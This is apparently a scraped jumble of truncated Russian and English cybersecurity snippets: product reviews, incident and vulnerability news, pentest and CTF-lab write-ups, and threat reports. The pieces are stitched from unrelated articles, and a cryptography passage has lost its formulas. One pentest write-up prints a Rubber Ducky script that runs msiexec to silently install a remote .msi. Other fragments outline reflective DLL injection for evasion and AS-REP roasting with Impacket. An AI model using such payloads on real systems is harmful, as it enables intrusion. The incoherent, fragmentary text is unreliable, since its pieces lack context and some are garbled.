Узнайте, как Boeing с помощью игровых технологий продлевает жизнь стратегическим бомбардировщикам.

Проба с Бенну успешно приземлилась в пустыне Юта.

Великобритания представляет ультра-детектор для поиска наркотиков в тюрьмах.

Узнайте, как подростковая киберпреступность становится новой угрозой в сети.

Можно ли сохранить анонимность после новых правил?

Как это повлияет на безопасность региона?

Радиоволны открыли нам новые горизонты в изучении сверхновых.

Кто победит в битве за интернет?

Критики не в восторге от новых мер безопасности LastPass.

Почему ученых не пугает встреча с инопланетянами

Кто стоит за атакой и как она угрожает Ближнему Востоку.

Как новые правила повлияют на ваш интернет?

Минцифры Российской Федерации представило проект постановления правительства о порядке проведения обследования трансграничных линий связи на портале проектов нормативных правовых актов.

Согласно предложенному регламенту, обследование будет проводить Роскомнадзор после получения уведомления от операторов, собственников или других владельцев технологических сетей связи, точек обмена трафиком или трансграничных линий связи о выполнении требований к трансграничным линиям связи.

Продолжительность обследования не должна превышать трех рабочих дней для документарного обследования и 15 рабочих дней для натурного обследования.

В случае выявления несоответс…

Германия успешно завершила испытания секретного лазерного оружия в мореAlexander AntipovГермания меняет правила игры в морской обороне.

Германия достигла значительного прогресса в области морской оборонной технологии, успешно завершив морские испытания лазерного оружия (laser weapon demonstrator, LWD).

Испытания были проведены после интеграции LWD на фрегате немецкого флота "SACHSEN" в 2022 году.

Ожидается, что оперативная система лазерного оружия будет дополнять существующие системы на основе стрелкового оружия и управляемых ракет.

Кроме того, в будущем система может быть модернизирована для уничтожения сверхзвуковых ракет, ракет и снарядов из минометов и артиллерии.

Готовы ли сети к военному положению?

Гены, отвечающие за память и обучение, возникли еще до первых животных.

Менеджер паролей для бизнеса «Пассворк» позволяет экономить время в рутинных делах, удобно организовывая безопасную работу с паролями в компании.

Предлагаем рассмотреть возможности и взглянуть на интересные решения актуальной на этот момент версии корпоративного менеджера паролей «Пассворк» — 6.0.

Импорт данных в сейф «Пассворк»Поддерживается возможность импортировать пароли в сейф из файлов CSV, JSON или в формате KeePass XML.

«Пассворк» собирает все события и метаданные, которые связываются с паролями, и на базе анализа даёт заключения и рекомендации.

ВыводыКорпоративный менеджер паролей «Пассворк» — программный комплекс от российского разработчика, минималистичный удобный продукт для без…

О том, что такое повышение осведомлённости в области борьбы с угрозами (Security Awareness) и как повысить киберграмотность специалистов, говорилось в прямом эфире AM Live.

Мария Павленко, эксперт по вопросам кибербезопасности пользователей, «Лаборатория Касперского»Александр Соколов:— Security Awareness подразделяется на три подпункта: кибергигиена, киберграмотность и киберосведомлённость.

Зрители эфира AM Live в опросе рассказали, что они делают в рамках процесса Security Awareness в своей компании.

Инвестировать в Security Awareness очень важно, это не так затратно, как вкладываться во всю систему, но даёт отличный эффект.

Александр Голубчиков:— Расходы на одного сотрудника по Security A…

ВведениеВ рамках атаки на цепочки поставок злоумышленники пытаются проникнуть в инфраструктуру жертвы через сторонние компании.

В этой статье мы рассмотрим примеры атак на цепочки поставок и риски подобных инцидентов, разберём популярные тактики нападения и методы защиты.

Как хакеры атакуют цепочки поставокСовершая атаки на цепочки поставок, злоумышленники преследуют разные цели.

Компании внедряют небезопасные компоненты от сторонних производителей и ПО с открытым кодом (Open Source Software, OSS).

Реализовать практику безопасности цепочек поставок ПО, которая представляет собой комплекс мер по обеспечению защищённости и целостности всех этапов разработки и распространения программных проду…

DDP-платформа (Distributed Deception Platform) «Гарда Deception 1.7.0» создаёт фиктивный слой объектов на контуре, неотличимых от защищаемых узлов сети.

Система «Гарда Deception» способна размещать и контролировать ложные учётные данные не только на ловушках, но и на настоящих конечных точках инфраструктуры.

Фильтрация осуществляется по времени, по критической значимости, по источнику, по заметкам, по обработке и источнику.

Также имеется фильтрация данных по домену, по статусу и по временному промежутку.

Раздел «Настройки» → «Общие» в «Гарда Deception»В общих настройках можно выбрать язык интерфейса, для уведомлений по электронной почте указываются данные SMTP.

Основное преимущество продукта — автоматизация процесса категорирования объектов КИИ и формирования соответствующих документов.

Как отследить все изменения в объектах КИИ и вовремя получить о них информацию?

Окно авторизации пользователя в «Купол.Документах»Агрегирование сведений об объектах КИИВвод информации об объектах КИИ осуществляется как в ручном режиме, так и в автоматизированном.

Перечень объектов КИИ с данными в «Купол.Документах»Автоматизировано и определение показателей критериев значимости объектов КИИ.

Окно работы с объектом КИИ в «Купол.Документах»Специалист может сформировать перечень объектов КИИ и увидеть, для всех ли задана категория и имеется акт категорирования.

В дальнейшем «Лаборатория Касперского» планирует ввести API-интеграцию с KCS в магазины приложений (маркетплейсы) облачных провайдеров, в том числе зарубежных, таких как AWS, Azure и иные.

Логи системы возможно направлять в любой комплекс управления событиями (SIEM) посредством Syslog, в частности — в SIEM KUMA от «Лаборатории Касперского».

Системные требования и лицензирование Kaspersky Container SecurityДля функционирования KCS с Kubernetes требуется версия системы контейнеризации не ниже 1.22.

Выбор проекта для сканирования в KCSСканирование возможно провести не только по базе известных CVE, но и по БДУ ФСТЭК России.

Эта возможность доступна как в режиме детектирования, так и в режиме пр…

ВведениеСпециалисты поговорили о том, как строится Offensive Security и как выглядит на практике, какие методы применяются для проверки защищённости отдельных приложений и инфраструктуры в целом.

Александр Колесов:— Offensive Security иными словами — это проверка имеющихся систем и средств безопасности на возможность их взломать.

Все методы, которые мы используем в Offensive Security, необходимы для оценки степени защищённости компании.

Практика OffSecПодавляющее большинство зрителей (58 %) полагают, что для эффективной OffSec необходимо совмещать регулярные пентесты, Red / Purple Teaming и Bug Bounty.

Процесс помогает улучшить защищённость организации и залатать дыры в безопасности.

К сожалению, подобного мнения придерживаются и в России, не разделяя хакеров на «светлых» и «тёмных».

Созданные российские платформы, прежде всего Standoff от Positive Technologies и BI.ZONE Bug Bounty, служат в том числе для нейтрализации этого негативного явления.

Наиболее продуктивно проявили себя Positive Technologies, «Лаборатория Касперского», «Яндекс» и BI.ZONE.

Более того, итоги пентестов устаревают в момент их подведения, потому что в системах постоянно открываются новые уязвимости, а охват исследований строго ограничивается.

Результаты первого года работы хакеров на платформе BI.ZONEНо события на рынке дают большие надежды.

В ходе тестирования федеральной системы дистанционного онлайн-голосования на предмет её готовности удалось обнаружить три ошибки.

ВведениеВ ходе двухдневного тестирования федеральной системы онлайн-голосования специалисты нашли в ней три программные ошибки.

Первой операцией стала процедура генерации ключей шифрования, которые будут защищённо храниться в помещении ТИК ДЭГ в Москве.

В случае подтверждения их валидности есть теоретическая возможность направить их в блокчейн несколько раз (во время тестирования — дважды).

Запуск блокчейн-сети ДЭГ в работуЗапуск блокчейн-сети федеральной системы ДЭГ состоялся 7 сентября.

Учитывая описанные выше особенности, можно сделать вывод, что применяемый способ передачи данных мог привести к нарушению режима ИБ, утечкам данных и нарушениям как в технологических, так и в бизнес-процессах предприятия.

Исходя из вышеперечисленных задач были сформулированы требования к процессу передачи данных между контурами безопасности.

Процесс передачи данных в реализованной системе между контурами показан на рисунках далее.

Полный процесс передачи данных между контурами безопасностиТаким образом, все требования к процессу передачи данных между контурами безопасности, указанные выше, были реализованы.

ВыводыДля построения системы обмена информацией между различными контурами безопасно…

Система работает на базе серверов стандартной архитектуры x86-64 и не только позволяет перенести в облако веб-сайты, порталы и бизнес-приложения, но и обеспечивает работу телекоммуникационных сервисов, виртуальных маршрутизаторов, межсетевых экранов, почтовых и прокси-серверов.

Архитектурное сравнение SpaceVM и SpaceVDI с платформой VMwareSpaceVM развивается не только как система виртуализации.

Совместимость системы SpaceVM с ПО и оборудованием российских производителейАрхитектура и системные требования SpaceVMSpaceVM предназначена для использования на серверных платформах с архитектурой x86-64.

Структурная схема SpaceVMМенеджер конфигурации (МК) представляет собой программный комплекс, пре…

Kaspersky Secure Mobility Management — это защита и администрирование корпоративных и личных мобильных устройств, которые используются сотрудниками в рабочей среде.

Принцип ввода нового мобильного устройства под контроль и управление со стороны Kaspersky Secure Mobility Management един для всех типов ОС.

Архитектура Kaspersky Secure Mobility ManagementСистема Kaspersky Secure Mobility Management представляет собой программное обеспечение для установки в контуре заказчика, имеет собственный каталог приложений для дальнейшей их установки на мобильные устройства сотрудников.

Реализация без использования агента на устройствеСистемные требования Kaspersky Secure Mobility ManagementОсновой для ра…

Александр Тарасов:— По моей оценке, 90 % корпоративных клиентов развернули VDI или для основной бизнес-задачи, или в качестве средства удалённого доступа во время пандемии.

Задачи, которые сегодня решают VDI, очень широки: работа и с обычными офисными приложениями, и с ВКС, и с различной периферией.

По словам Дениса Агеева, пару лет назад статистика была немного другой: компании старались использовать или VDI, или классическую инфраструктуру без удалённого доступа.

По словам Дениса Мухина, 92 % компаний по всему миру используют средства виртуализации, около 40 % — VDI и терминальные доступы.

Александр Тарасов:— Мы контролируем устройства с помощью сервера управления, распространяем политики…

Рынок сетевой безопасности очень сложен, причём как с точки зрения предложения, так и в отношении спроса.

Для малых частных организаций важным является наличие широкофункциональных устройств (по той же причине, что и для малых государственных организаций).

Боязнь мигрировать со стороны некоторых заказчиков является вполне оправданной, так как переходить с одного NGFW на другой трудно.

Сама боязнь, как правило, связана с двумя мнениями:Один в один мигрировать с иностранного NGFW на отечественный нельзя.

ВыводыКак итог, мнение о том, что отечественных NGFW не существует, может являться лишь «ошибкой выжившего».

Программно-аппаратный комплекс «КриптоПро HSM 2.0 R3» с платёжным модулемФункциональные возможности «КриптоПро HSM 2.0 R3» с платёжным модулемПрограммно-аппаратный комплекс «КриптоПро HSM 2.0 R3» с платёжным модулем разработан в соответствии с Положением Банка России от 4 июня 2020 г.

Схема подключения «КриптоПро HSM 2.0 R3» с платёжным модулемТиповая схема подключения «КриптоПро HSM 2.0 R3» с платёжным модулем состоит из следующих элементов: хост-система, АРМ веб-администрирования HSM, терминал доступа к консоли HSM, принтер и сам платёжный HSM.

Настройка сервисов PCI HSM в «КриптоПро HSM 2.0 R3» с платёжным модулемТерминал доступа к консоли платёжного документа используется для отправки к…

В предыдущей статье мы обсуждали, как восстановить имена функций в удаленных файлах Go и как помочь Ghidra распознавать и определять строки в этих двоичных файлах.

На момент написания этой статьи последней версией Go была go1.18, и мы использовали последнюю версию Ghidra - 10.1.4.

Как и ранее, все созданные нами скрипты Ghidra можно найти в нашем репозитории GitHub вместе с тестовыми файлами «Hello World».

Восстановление имени функцииНаш скрипт восстановления имени функции был обновлен и теперь работает как с файлами ELF, так и с PE, а также с последней версией Go.

Добавьте подробные определения типов для других типов, а не только для функций, структур и интерфейсов.

Вирус не был разрушительным и лишь замедлял работу дискеты, делая 7 килобайт памяти недоступными для MS-DOS.

Братья не ожидали, что станут популярными и получат кучу звонков со всего мира, с требованием пользователей убрать вирус с их компьютеров.

Однако вирус содержал кучу багов и был несовместим с некоторыми версиями и языками Windows 95.

Хотя данный вирус не наносил непосредственного ущерба данным, он вызвал множество проблем.

Поэтому нужно периодически сканировать компьютер антивирусами, следить за своими данными, почаще менять пароли, делать бэкапы и в общем, следить за цифровой гигиеной.

Если сервер поддерживает WebSocket, он возвращает HTTP-ответ с заголовком Upgrade: websocket , и соединение переключается на WebSocket.

Обмен данными: Клиент и сервер могут отправлять друг другу текстовые или бинарные кадры через установленное соединение.

Компоненты WSДавайте подробнее разберемся в его важнейших компонентах:Длина полезной нагрузки (Payload len)Используется для кодирования общей длины данных полезной нагрузки в WebSocket.

Манипулирование сообщениями WebSocketБольшинство уязвимостей WebSocket, связанных с вводом данных, могут быть найдены и использованы путем подмены содержимого сообщений WebSocket.

Функциональность тестирования WebSocket в Gauntlt может быть использована для…

Одна из первых вещей, на которую мне нужно обратить внимание, заключается в том, что многие новички в мире Bug Bounty часто упускают из виду разведку.

Возможно, из-за голливудского эффекта многие люди считают, что будут сталкиваться с уязвимостью в системе безопасности каждые пять минут без каких-либо предварительных исследований.

Инструменты, полезные во время разведкиПоиск информации о доменном имени:https://bgp.he.net/ - Он предоставляет информацию об IP-адресах, сетях и подключениях и использует протокол BGP.

Это поможет вам как в сканировании портов, определении IP-адресов, проверки записей DNS, проверки сервера электронной почты, определения местоположения веб-сайта, проверки SSL-серт…

В этой статье речь пойдет об использовании отражающих dll инъекций (reflective dll injection), которые позволяют в определенной степени спрятаться от средств защиты на этапе закрепления на машине жертвы.

Отражающая dll инъекция это метод, который позволяет злоумышленнику внедрять dll файлы в процесс жертву из памяти, а не из файла с диска, в результате ее практически невозможно обнаружить ни на уровне системы , ни на уровне процесса.

То есть на машине жертвы не будет ни файлового тела ни на уровне системы ни на уровне процесса.

Эта dll физически не находится на машине жертвы.

Заглянем под капотДавайте посмотрим, что происходит на машине жертвы при реализации инъекции отраженной dll.

В результате хорошо известные угрозы и атаки, такие как распределённый отказ в обслуживании (DDoS) и «человек посередине» (Man-in-the-Middle, MitM), достаточно легко и непринуждённо применяются для компрометации систем IoT.

Конечно, имеются адаптации традиционных стандартов и некоторые специализированные разработки, типа OWASP , IoT SMM и программы безопасности NIST .

Из-за неоднородности устройств и протоколов, а также широкого разнообразия вариантов использования, которые могут поддерживать системы IoT, эта ситуация представляет собой серьёзную проблему для обеспечения безопасности и конфиденциальности.

Прикладной уровень MQTT, AMQP, CoAP, HTTP Транспортный и сетевой уровни UDP, TCP, IPv6…

Самый очевидный вариант сделать это через урезанный VPN, но тут возникают препятствия в виде девайсов, с которых подключаются пользователи, и качество интернета, которым они пользуются.

В поисках более стабильного решения для нашей проблемы мы наткнулись на статью Авторизация с помощью сертификата ssl на nginx + Let's Encrypt.

Попробовали реализовать ее на нашей инфре и столкнулись с проблемой, что сертификаты для пользователей создаются, но при попытке подключиться к целевому веб ресурсу, созданный сертификат не проходит аутентификацию и падает с 404 ошибкой.

После анализа обнаружили проблему, что алгоритм шифрования который используется в статье, не подходит для нашей конфигурации nginx 1…

SSL в MySQL, а позже и в MariaDB, не работал сам, сразу.

Но для правильного использования SSL клиент должен проверить серверный сертификат и убедиться, что он правильный.

Но он не знает хэш пароля и не сможет подделать эту подпись.

И тогда можно включить SSL на всех клиентах, чтоб они требовали SSL, проверяли сертификаты, и отключались, если сертификат неправильный.

Но ожидается, что таких пострадавших будет мало, а подавляющее большинство юзеров получит надёжный SSL, ничего не делая, то есть даром, и пусть никто не уйдёт незащищённый.

Недавно мы делали задачу по предотвращению рисков в связи с использованием приложения с Jailbreak.

Наверное, каждый хоть раз слышал слово jailbreak, но давайте разберемся, зачем это нужно, чем опасно и как его обнаружить.

Также Apple не поддерживает устройства с jailbreak, из-за чего после взлома они перестают получать важные обновления, в том числе обновления системы безопасности.

Лучше всего отловить пользователя с JailBreak до того, как он получит доступ к персональным данным или к денежным средствам.

Это упрощает тестирование и отладку работы проверки на JailBreak, но при этом создает проблемы для автотестов и для дальнейшей работы с симулятором.

Ну, я все это долго и муторно проделывал, а таска еще и периодически обрастала какими-то дополнительными требованиями от тестировщиков.

3-4 часа работы — и все: задача отправлена на тестирование и влита в релизную ветку.

Так что не стоит бояться своей неопытности или думать, что из-за возраста к тебе не станут прислушиваться.

В ходе анализа важно выявить все связи, все узкие места и все сложности, которые могут возникнуть во время реализации.

Я пофиксил две своих проблемы, а вылезло еще шесть.

В этот раз «подбили» итоги небольшого опроса среди специалистов по информбезопасности об их отношении к «удаленке».

Кадр из фильма «Марсианин»Оказалось, что 59% начальников отделов информационной безопасности стали положительно относиться к «удаленке».

Таковы результаты опроса более 330 руководителей служб ИБ из российских компаний кредитно-финансовой, промышленной, нефтегазовой, транспортной, строительной и других отраслей.

Вместе с тем, руководители служб ИБ по-прежнему считают, что некоторых специалистов не стоит отпускать на дистанционную работу.

А по итогам первого пандемийного года 90% опрошенных отметили, что на «удаленке» IT-инфраструктура их организаций стала уязвимее.

Перед миграцией проанализировали домен с помощью инструментов OSINT.

Помимо того, что это on-premise утилита, оно отличается от DNSDumpster возможностью автоматизировать поиск с помощью скриптов.

Там все просто: вводите домен и видите, какие записи и адреса менялись.

До покупки важно проверить, не зарегистрирован ли домен в черных списках DNS (DNSBL), и не приобретаете ли вы вместе с доменом его сомнительную репутацию.

Возможно, незаметно для вас самих ваш домен участвует в рассылке спама, а значит ваш почтовый сервер и домен скомпрометированы.

Для участников, представленных множеством нумераторов доверенная сторона формирует набор долговременных общедоступных ключей набор персональных секретных ключей участников а также групповой общедоступный ключПодготовка (Вход: Выход:если то выбирает другое если то переходит к 3. если то выбирает другое если то переходит к 5. если то переходит к 5.

Если то выбирает вычисляет проверяет условие Если то выбирает новое и заново выполняет необходимые вычисления и проверки.

Если то выбирает и вычисляет Если то выбирает новое и заново выполняет необходимые вычисления и проверки.

Если то вычисляет выбирает и затем вычисляет Если то выбирает новое и заново выполняет необходимые вычисления и проверки.

…

Данная статья содержит подробный разбор лабораторной работы с TryHackMe, посвященной тестированию на проникновение Active Directory.

Дисклеймер: Все методы примененные в статье продемонстрированы в учебных целяхШаг 0: Сканирование с помощью NmapЛюбой пентест начинается со сканирования внутренней сети.

GetNPUsers запрашивает целевой домен для пользователей с установленным параметром "Не требовать предварительной аутентификации Kerberos", собирает ответы AS_REP без предварительной аутентификации и экспортирует их TGT для подбора пароля, так как они зашифрованы паролем пользователя.

Для этого указываем домен, пользователя, его пароль и ip целевого хостаРезультат работы ImpacketКак это работает…

Министерство государственной безопасности КНР опубликовало официальное заявление в WeChat, в котором обвинило США во взломе серверов компании Huawei в 2009 году и проведении ряда других кибератак с целью хищения важных данных.

Так, в Министерстве государственной безопасности КНР заявляют, что еще в 2009 году спецслужбы США «начали вторгаться на серверы в штаб-квартире Huawei и [потом] продолжали следить за ними».

Заявление продолжается тем, что в 2022 года было обнаружено, что США «осуществили десятки тысяч вредоносных атак», в том числе на Северо-Западный политехнический университет, контролировал десятки тысяч сетевых устройств и в итоге похитили множество ценных данных.

Еще одно обвинени…

Оказалось, что количество критических автомобильных уязвимостей снизилось с 25% от общего числа в 2016 году до 10% в 2018 году и 12% в 2022 году.

При этом доля высокорисковых уязвимостей постепенно снизилась с 25% в 2016 году до 21% в прошлом году.

Доля проблем с наиболее вероятной эксплуатацией так же упала до 16% в 2022 году (по сравнению с 21% в 2016 году).

Это, по мнению IOActive, свидетельствует о том, что уязвимости становится сложнее эксплуатировать, а «векторы обнаружения уязвимостей становятся менее удаленными».

Зато в IOActive отметили незначительный, но очень важный рост (с 0% до 1%) радиочастотных атак, в частности на дистанционный бесключевой доступ и Bluetooth.

Pentest Award В августе 2023 года прош­ла церемо­ния наг­ражде­ния Pentest Award — пре­мии для спе­циалис­тов по тес­тирова­нию на про­ник­новение, которую учре­дила ком­пания Awilix.

Этим я и вос­поль­зовал­ся, что­бы быть одним из пер­вых, кто нач­нет тес­тировать недав­но добав­ленный сер­вис.

В течение 2021 года я не очень активно хан­тил и не сле­дил за обновле­ниями в избран­ной прог­рамме.

json& hosting = youtubeГо­тов пос­порить, что более опыт­ный читатель уже захотел изме­нить GET-параметр config на свой хост для получе­ния вхо­дяще­го HTTP-соеди­нения, что я и сде­лал.

Уяз­вимость была най­дена еще в 2019 году, поэто­му я ожи­дал, что опи­сыва­емые в статье откры­тые редирек­ты у…

Совместное расследование компаний SentinelLabs и QGroup GmbH обнаружило шпионскую кампанию неизвестной ранее группировки Sandman, направленную на поставщиков телекоммуникационных услуг на Ближнем Востоке, в Западной Европе и в субконтиненте Южной Азии.

После этого Sandman применяет атаки типа pass-the-hash для аутентификации на удаленных серверах и в службах через повторное использование NTLM-хэшей, хранящихся в памяти.

Отмечается, что в своих атаках Sandman использует модульное вредоносное ПО LuaDream, которое применяется для атак типа DLL hijacking на целевые системы.

Малварь получила такое название благодаря использованию JIT-компилятора LuaJIT, и исследователи отмечают, что это довольно…

Компания Apple выпустила экстренные патчи для исправления трех новых уязвимостей нулевого дня, которые уже использовались в атаках на пользователей iPhone и Mac.

Таким образом, в 2023 году в продуктах Apple была устранено уже 16 0-day уязвимостей.

Сообщается, что все проблемы обнаружены экспертами из Citizen Lab и Google Threat Analysis Group.

Уязвимости представляли угрозу для следующих устройств:iPhone 8 и новее;iPad mini 5-го поколения и новее;Mac под управлением macOS Monterey и новее;Apple Watch Series 4 и новее.

К примеру, ранее в этом месяце исследователи Citizen Lab предупреждали, что другие 0-day уязвимости в продуктах Apple являлись частью цепочки zero-click эксплоитов для iMessag…

На GitHub нашли фальшивый PoC-эксплоит для недавно исправленной уязвимости в WinRAR.

Уязвимость в WinRAR, CVE-2023-40477, летом текущего года исправленная в версии 6.23, позволяла добиться выполнения произвольного кода в целевой системе.

Как сообщают исследователи, на самом деле подделка представляет собой Python-скрипт и является модификацией общедоступного эксплоита для совершенно другой уязвимости — CVE-2023-25157 (критическая SQL-инъекция в GeoServer).

В итоге, вместо запуска PoC-эксплоита для WinRAR, в системе жертвы создавался batch-скрипт и загружался закодированный скрипт PowerShell, который затем выполнялся на хосте.

Этот скрипт, в свою очередь, загружал малварь VenomRAT и создавал…

Erid: Kra23pnvoВ августе 2023 года ГК «Астра» сообщила о запуске Bug Bounty на площадке BI.ZONE, которая стала первой программой по поиску уязвимостей операционных систем в России.

Платформа BI.ZONE Bug Bounty, впервые представленная в прошлом году на конференции OFFZONE, позиционируется как хаб для компаний, которые хотят проверить уровень защищенности своих сервисов, и багхантеров, которые получают вознаграждение за найденные уязвимости.

Напомним, что в рамках партнерства с BI.ZONE «Астра» разместила на платформе публичную программу с денежными выплатами.

При этом bug bounty программа является не совсем обычной с точки зрения поиска уязвимостей.

С подробной информацией о самой программе B…

Агентство пограничных служб Канады (CBSA) сообщило, что из-за кибератаки в канадских аэропортах возникли массовые перебои в обслуживании.

Канадская газета La Presse пишет, что из-за DDoS-атаки возникли значительные задержки в обработке прибывающих пассажиров на пограничных контрольно-пропускных пунктах по всей стране, включая международный аэропорт имени Пьера Эллиота Трюдо.

Никакая личная информация не была раскрыта в результате этих атак», — подчеркивают в CBSA.

При этом представители CBSA не возложили ответственность за произошедшее именно на NoName057(16), а также не пояснили, каким образом DDoS-атаки могли затронуть компьютерные системы, связанные с киосками регистрации в аэропортах.

Д…

Компания T-Mobile допустила ошибку во время обновления, и в результате некоторые клиенты увидели в приложении личную информацию других пользователей.

Пользователи T-Mobile в социальных сетях пишут, что видели аккаунты и платежные данные других людей.

Также люди сообщали, что видели в приложении личные данные не одного, а двух и более человек.

Теперь представители T-Mobile уверяют, что причиной сбоя стала не кибератака, и системы компании не были взломаны.

И хотя пользователи массово жаловались на проблемы, в компании подчеркивают, что инцидент имел «ограниченное воздействие» и затронул менее 100 человек.

Специалисты из компании Cado Security заметили, что с августа 2023 года активность червя P2PInfect, который атакует серверы Redis, резко возросла.

Благодаря постоянным улучшениям и изменениям, P2PInfect стал более незаметным, и атаки происходят в Китае, США, Германии, Сингапуре, Гонконге, Великобритании и Японии.

Исследователи фиксируют постоянный рост количества попыток атак P2PInfect на свои ханипоты, в результате чего, по состоянию на 24 августа 2023 года, было зафиксировано 4064 таких события.

Уже 3 сентября 2023 года количество событий увеличилось в три раза, а затем, в период с 12 по 19 сентября 2023 года, произошел крупный всплеск активности P2PInfect: только за этот период исследова…

На этой неделе компания Trend Micro предупредила клиентов об исправлении критической 0-day уязвимости, затрагивающая Apex One и другие продукты для конечных точек.

Проблеме был присвоен идентификатор CVE-2023-41179 (9,1 балла по шкале CVSS), и она затрагивает следующие бизнес-продукты:Trend Micro Apex One 2019;Trend Micro Apex One SaaS 2019;Worry-Free Business Security (WFBS) 10.0 SP1 (он же Virus Buster Business Security в Японии);Worry-Free Business Security Services (WFBSS) 10.0 SP1 (Virus Buster Business Security Services в Японии).

Trend Micro заявила, что успешная эксплуатация проблемы позволяет злоумышленнику манипулировать компонентом для выполнения произвольных команд на уязвимых у…

В августе 2023 года прош­ла церемо­ния наг­ражде­ния Pentest Award — пре­мии для спе­циалис­тов по тес­тирова­нию на про­ник­новение.

В этой статье соб­раны рай­тапы, заняв­шие чет­вертое, третье и вто­рое мес­та в номина­ции «Про­бив», а сле­дом отдель­ной пуб­ликаци­ей вый­дет работа, взяв­шая пер­вое мес­то.

Дос­туп к рабоче­му компь­юте­ру сот­рудни­ка был получен пря­мо с ули­цы, по модели внеш­него наруши­теля и с исполь­зовани­ем мобиль­ного телефо­на.

Для экс­плу­ата­ции на под­вержен­ном ПК была наб­рана коман­да из сле­дующе­го ducky-скет­ча:GUI r DELAY 300 STRING msiexec / i https:/ / en.

tk/ 1. msi / quiet DELAY 300 ENTER DELAY 300 GUI SPACE DELAY 300 GUI r DELAY 300 STRING msie…

Разработчики Free Download Manager опубликовали скрипт, который позволит пользователям проверить, не было ли их Linux -устройство скомпрометировано в ходе атаки на цепочку поставок.

Дело в том, что недавно «Лаборатория Касперского» обнаружила бэкдор, который несколько лет скрывался в коде этого популярного менеджера загрузок для Linux.

На прошлой неделе «Лаборатория Касперского» сообщила об обнаружении вредоносной кампании, которая длилась более трех лет и была связана с Free Download Manager.

Оказалось, что это легитимное ПО для установки приложений использовалось для распространения Linux-бэкдора, так как злоумышленники скомпрометировали официальный сайт Free Download Manager (freedownloa…

Международный уголовный суд (МУС) сообщил о кибератаке, в результате которой на прошлой неделе оказались взломаны его системы.

«В конце прошлой недели специалисты Международного уголовного суда обнаружили аномальную активность, затрагивающую информационные системы.

В связи со случившимся, представители Международного уголовного суда сообщают о планах по улучшению своей киберзащиты, включая ускоренное внедрение облачных технологий.

В настоящее время не сообщается никаких деталей о характере и масштабах кибератаки, о ее воздействии на системы МУС, а также о том, удалось ли злоумышленникам получить доступ к каким-либо данным и файлам в скомпрометированной сети.

Представители МУС лаконично сооб…

Новое исследование, проведенное специалистами VulnCheck, показало, что около 12 000 подключенных к интернету межсетевых экранов Juniper SRX и коммутаторов EX все еще уязвимы перед недавно обнаруженной RCE-уязвимостью.

Он задействует только уязвимость CVE-2023-36845 и уже не требует загрузки файлов, по-прежнему позволяя добиться удаленного выполнения произвольного кода.

Так выяснилось, что необходимость загрузки двух файлов на целевой девайс можно обойти, и другие уязвимости для удаленного выполнения кода вообще не требуются.

Между тем, проведенное VulnCheck сканирование показало, что в интернете можно обнаружить 14 951 веб-интерфейсов Juniper.

Если экстраполировать это на все обнаруженные у…

Cybersecurity researchers have discovered a previously undocumented advanced backdoor dubbed Deadglyph employed by a threat actor known as Stealth Falcon as part of a cyber espionage campaign.

The Executor then proceeds with loading a .NET component known as the Orchestrator that, in turn, communicates with the command-and-control (C2) server to await further instructions.

UPCOMING WEBINAR AI vs. AI: Harnessing AI Defenses Against AI-Powered Risks Ready to tackle new AI-driven cybersecurity challenges?

The Timer module is used to poll the C2 server periodically in combination with the Network module, which implements the C2 communications using HTTPS POST requests.

While the nature of the s…

]com, is said to have been delivered after Eltantawy was redirected to a website named c.betly[.

]me by means of a sophisticated network injection attack using Sandvine's PacketLogic middlebox situated on a link between Telecom Egypt and Vodafone Egypt.

"If the user was the expected targeted user, the site would then redirect the target to the exploit server, sec-flare[.]com."

While these links don't match the fingerprint of the aforementioned domain, the investigation revealed that the Predator spyware was installed on the device approximately 2 minutes and 30 seconds after Eltantawy read the message sent in September 2021.

"Although great strides have been made in recent years to 'encrypt…

An active malware campaign targeting Latin America is dispensing a new variant of a banking trojan called BBTok, particularly users in Brazil and Mexico.

BBTok is a Windows-based banking malware that first surfaced in 2020.

The attack chains themselves are fairly straightforward, employing bogus links or ZIP file attachments to stealthily deploy the banker retrieved from a remote server (216.250.251[.

Once launched, BBTok establishes connections with a remote server to receive commands to simulate the security verification pages for various banks.

UPCOMING WEBINAR AI vs. AI: Harnessing AI Defenses Against AI-Powered Risks Ready to tackle new AI-driven cybersecurity challenges?

Let's dive into the 2023 MITRE ATT&CK Evaluation results.

The MITRE ATT&CK Evaluation is performed by MITRE Engenuity and tests endpoint protection solutions against a simulated attack sequence based on real-life approaches taken by well-known advanced persistent threat (APT) groups.

The 2023 MITRE ATT&CK Evaluation tested 31 vendor solutions by emulating the attack sequences of Turla, a sophisticated Russia-based threat group known to have infected victims in over 45 countries.

The MITRE ATT&CK Evaluation results aren't presented in a format that many of us are used to digesting (looking at you, magical graph with quadrants).

MITRE ATT&CK Results SummaryThe following tables present Cynet's…

Israeli organizations were targeted as part of two different campaigns orchestrated by the Iranian nation-state actor known as OilRig in 2021 and 2022.

Active since 2014, the threat actor has used a wide range of tools at its disposal to carry out information theft.

Storm-0133, also associated with MOIS, exclusively targets Israeli local government agencies and companies serving the defense, lodging, and healthcare sectors, the Windows maker said.

UPCOMING WEBINAR AI vs. AI: Harnessing AI Defenses Against AI-Powered Risks Ready to tackle new AI-driven cybersecurity challenges?

For C2 purposes, the threat actor compromised a legitimate Israeli job portal website.

Atlassian and the Internet Systems Consortium (ISC) have disclosed several security flaws impacting their products that could be exploited to achieve denial-of-service (DoS) and remote code execution.

The Australian software services provider said that the four high-severity flaws were fixed in new versions shipped last month.

This includes -CVE-2022-25647 (CVSS score: 7.5) - A deserialization flaw in the Google Gson package impacting Patch Management in Jira Service Management Data Center and Server(CVSS score: 7.5) - A deserialization flaw in the Google Gson package impacting Patch Management in Jira Service Management Data Center and Server CVE-2023-22512 (CVSS score: 7.5) - A DoS flaw i…

The list of security vulnerabilities is as follows -CVE-2023-41991 - A certificate validation issue in the Security framework that could allow a malicious app to bypass signature validation.

- A certificate validation issue in the Security framework that could allow a malicious app to bypass signature validation.

CVE-2023-41992 - A security flaw in Kernel that could allow a local attacker to elevate their privileges.

Apple did not provide additional specifics barring an acknowledgement that the "issue may have been actively exploited against versions of iOS before iOS 16.7."

UPCOMING WEBINAR AI vs. AI: Harnessing AI Defenses Against AI-Powered Risks Ready to tackle new AI-driven cybersecuri…

A previously undocumented threat actor dubbed Sandman has been attributed to a set of cyber attacks targeting telecommunic koation providers in the Middle East, Western Europe, and the South Asian subcontinent.

"The implementation of LuaDream indicates a well-executed, maintained, and actively developed project of a considerable scale."

"The LuaDream staging chain is designed to evade detection and thwart analysis while deploying the malware directly into memory," Milenkoski explained.

